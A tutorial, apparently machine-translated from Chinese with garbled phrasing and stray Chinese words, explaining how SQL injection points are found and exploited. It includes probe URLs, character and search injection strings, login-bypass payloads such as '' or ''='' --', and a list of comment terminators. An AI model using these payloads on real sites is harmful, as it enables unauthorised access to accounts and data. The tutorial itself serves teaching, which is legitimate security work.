Introduction:
Causes of SQL Injection Vulnerabilities
- SQL Injection
-
When programmers write code, they do not judge the legitimacy of user
input
data , which makes
the application program have security risks . database operations
SQL statement
- Structured Query Language
-
Structured query language
is the standard language for relational database communication.
Query:
SELECT statement FROM table WHERE condition
delete record:DELETE FROM table WHERE condition
update record:UPDATE table SET field=value WHERE condtion
add record:INSERT INTO table field VALUES(values)
SQL
Injection attack process
Determine the injection point
Determine the injection point type
Determine database type
Get the database database, escalate privileges
1. Determine SQL
the injection point
Finding the injection point is the most critical and basic link
- The essential principle is:
-
Find a point that needs to be processed in the background and
submitted to the database.
As long as all inputs interact with the database,SQL
injection may be triggered - Generally three categories
-
Get
parameter triggerSQL
injection
POST
parameter triggerSQL
injection
Cookie
triggerSQL
injection - E.g:
-
In the parameters of the regular link (
链接?参数
) find the form such?id=num
as , the search box,
There are many ways to verify whether there is an injection point. The
most conventional and simplest method is to introduce single quotes to determine whether there is an injection point.
http://host/test.php?id=100’
Returns an error indicating the possibility of injection
http://host/test.php?id=100 and 1=1
return to normal
http://host/test.php?id=100 and 1=2
return error
If the above three points are met, 注入点
the possibility of yes is very high.
After finding the injection point, it is
2. Determine the injection type
0x01 digital injection point
testing method:
http://host/test.php?id=100 and 1=1
return success
http://host/test.php?id=100 and 1=2
return failure
Why does the first one return success and the second one fails?
- The reasons are as follows:
-
Suppose the SQL query statement of our website is like this,
SELECT * FROM news WHERE id=$id
here$id
is the user submittedWhen we enter the
100 and 1=1
statement it becomes like this
SELECT * FROM news WHERE id=100 and 1=1
The left side of this
SQL
statementand
returns success, because weid
add our injection statement after it exists. If thisid
does not exist, it cannot be tested.On the
and
right, 1=1 is also constant, so the entire statement returns successOf course, if it is changed later
1=2
, because it1=2
is not valid,and
the judgment logic of the statement is that as long as one of the statements is not valid, it will return failure, so the1=2
final return is failure.
0x02 Character injection point
Test method:
http://host/test.php?name=man' and '1'='1
return success
http://host/test.php?name=man' and '1'='2
return failure
This makes the above number type into a character type
- The reasons are as follows:
-
Or suppose that the SQL statement of our website is like this.
SELECT * FROM news WHERE name='$name'
When we construct the input as the following, the
man' and '1'='1
statement becomes
SELECT * FROM news WHERE name='man' and '1'='1'
Did you find anything? This SQL has been closed
It is still the same,
and
the left side here must be established, and theand
right side is also established, so after the and logic, the entire statement returns success.
Similarly it can be seen that if the latter is followed,1'='2
it will return failure. Of course, it does not have to be1
or2
, because it is character type, so we can enter any character
like this
http://host/test.php?name=man' and 'a'='a
return success
http://host/test.php?name=man' and 'a'='b
return failure
0x03 Search injection point—currently common
testing method
http://host//test.php?keyword=python%' and 1=1 and '%'='
http://host//test.php?keyword=python%' and 1=2 and '%'='
Suppose our SQL query statement is like this
SELECT * FROM news WHERE keyword like '%$keyword%'
Here
$keyword
is the user inputWhen we enter the following statement, we
pt%' and 1=1 and '%'='
end up with the following statement,
SELECT * FROM news WHERE keyword like '%pt%' and 1=1 and '%'='%'
which is closed again
Here we will analyze the following, because it is and
logic, as long as there is an error, an error will be returned
We can divide this statement into three paragraphs
SELECT * FROM news WHERE keyword like '%python%'
and 1=1
and '%'='%'
The statement on the first line is definitely successful (again, we are constructing SQL injection on the existing query)
The second sentence is also the third sentence, because I must be equal to myself.
But if we replace the second sentence
1=2
with, then this sentence will definitely return failure, which is the principle
0x04 Inline SQL Injection – Commonly Used
Inline injection means that after the query is injected into the SQL
code, the original query is still fully executed
Suppose our website SQL
query statement is like this
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
This looks like the code for a login page
If we construct the following statement and submit it to the login box
username
' or ''='
Or submit it to the
password
box. The two submission methods are different. Let's analyze these two submission methods below.The statement submitted to
username
us would become like this
SELECT * FROM admin WHER username='' or ''='' AND password ='fuzz'
fuzz
is the string we just enter
And submit to
password
it will be like this
SELECT * FROM admin WHER username='fuzz' AND password ='' or ''=''
- Note:
-
In the
SQL
statement ,AND
the priority is greater thanOR
the
first calculationAND
, then the calculationOR
, so here our statement will beOR
divided into two paragraphsSQL
statement
it's username
framed
SELECT * FROM admin WHER username=''
or
''='' AND password ='fuzz'
Or password
frame like this
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
We first use the first to analyze
AND
After calculating first
SELECT * FROM admin WHER username=''
return failure
or
''='' AND password ='fuzz'
return failure
The database does not exist username
as NULL
a field, so the first sentence returns a failure, and in the third sentence, because password
we entered casually, 99.99%
the password will not exist, so AND
after that, our third sentence also fails. , so the entire statement returns a failed
But our password
situation is different
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
Here our first sentence is to return failure, but our second sentence ''=''
is to return success, the OR
logic is to return success if one is successful, so our entire statement will return success
After the return is successful, we will bypass the login form and log in directly to the system.
0x05 Terminating SQL Injection - Commonly Used
Terminating SQL
statement injection means that when an attacker injects SQL
code, he successfully ends the statement by annotating the rest of the query.
So the annotated query will not be executed, let's take the above example as an example
We already know above,
username
fill in the box
' or ''='
The program will not return success, so we have no way to
username
make a fuss?
Wrong, we still have a terminator
or the SQL
query above
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
Here we construct the following username
input
' or ''='' --
Then we can get the following query
SELECT * FROM admin WHER username='' or ''='' --' AND password ='fuzz'
Here fuzz
is what we enter casually, it --
is a comment
In this way, our statement can be divided into three parts
SELECT * FROM admin WHER username=''
or ''='' 返回成功
--' AND password ='fuzz'
The first sentence must return failure, but our second sentence will return success
It has been commented out by us and will not be executed, so we can still username
bypass the login by doing this trick
The following are some of our common termination methods
Terminate string:
-- , #, %23, %00, /*
Termination method:
-- , ‘-- , ‘)-- , ) -- , ‘)) --, ))--